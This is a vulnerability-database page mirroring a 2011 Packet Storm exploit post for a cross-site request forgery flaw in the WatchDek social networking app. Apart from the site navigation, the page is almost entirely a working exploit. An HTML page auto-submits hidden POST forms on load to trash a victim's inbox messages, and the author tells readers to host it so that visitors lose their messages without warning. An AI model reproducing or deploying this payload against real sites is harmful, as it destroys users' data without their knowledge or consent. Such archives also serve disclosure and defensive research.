Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormXecuti0N3rPACKETSTORM:100242
HistoryApr 09, 2011 - 12:00 a.m.

Watchdek Force Delete Cross Site Request Forgery

2011-04-0900:00:00
Xecuti0N3r
packetstormsecurity.com
15
JSON
`#(+) Exploit Title: WatchDek Social Networking XSRF Vulnerability (Force Delete Victim Inbox)  
#(+) Author : ^Xecuti0n3r  
#(+) Date : 7.04.2011  
#(+) Hour : 13:37 PM  
#(+) E-mail : xecutioner()yahoo.com  
#(+) Category : Web Apps [XSRF]  
#(+) App website: watchdek.com  
  
#All you have to do is save the below code as exploit.html  
#Then Host a website with the exploit.html file. Any person who visits the website  
# will see that all the messages in his watchdek inbox is deleted without warning ;)   
____________________________________________________________________  
____________________________________________________________________  
Code:  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
  
<html>  
<head>  
<title>Watchdek Force Delete Victim Inbox</title>  
</head>  
  
<body onload="javascript:fireForms()">  
<script language="JavaScript">  
  
function fireForms()  
{  
var count = 10;  
var i=0;  
  
for(i=0; i<count; i++)  
{  
document.forms[i].submit();  
}  
}  
  
</script>  
<H2>Watchdek Force Delete Victim Inbox</H2>  
<form method="POST" name="form3" action="http://localhost:80/index.php?option=com_jam&format=raw">  
<input type="hidden" name="search" value=""/>  
<input type="hidden" name="mid[]" value="501"/>  
<input type="hidden" name="mid[]" value="500"/>  
<input type="hidden" name="toggle" value="on"/>  
<input type="hidden" name="controller" value="action"/>  
<input type="hidden" name="view" value="inbox"/>  
<input type="hidden" name="action" value="trash"/>  
<input type="hidden" name="limitstart" value="0"/>  
<input type="hidden" name="boxchecked" value="2"/>  
<input type="hidden" name="attr" value=""/>  
<input type="hidden" name="filter_tag" value=""/>  
<input type="hidden" name="filter_order" value="m.datetime"/>  
</form>  
</body>  
</html>  
  
########################################################################  
(+)Exploit Coded by: ^Xecuti0N3r   
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r  
(+)Gr33ts to : -[SiLeNtp0is0n]- , 3thicaln00b, eXes0ul and all Friends at Indian Cyber Army & Indishell Crew  
########################################################################  
`
JSON